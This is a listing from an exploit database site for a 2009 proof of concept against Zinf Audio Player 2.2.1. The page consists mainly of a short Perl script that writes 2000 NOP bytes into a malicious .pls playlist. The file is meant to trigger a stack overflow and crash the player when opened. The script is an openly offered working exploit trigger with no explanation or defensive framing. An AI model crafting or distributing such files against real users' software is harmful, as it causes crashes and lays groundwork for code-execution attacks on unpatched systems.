[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zinf Audio Player 2.2.1 (PLS File) Stack Overflow PoC

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6735
Category
dos / poc
Date add
27-01-2009
Platform
unsorted
=====================================================
Zinf Audio Player 2.2.1 (PLS File) Stack Overflow PoC
=====================================================




#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE)  Buffer Overflow PoC

my $chars="\x90" x 2000;

open(MYFILE,'>>hakxer.pls');

print MYFILE $chars;

close(MYFILE);

print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";



#  0day.today [2024-12-24]  #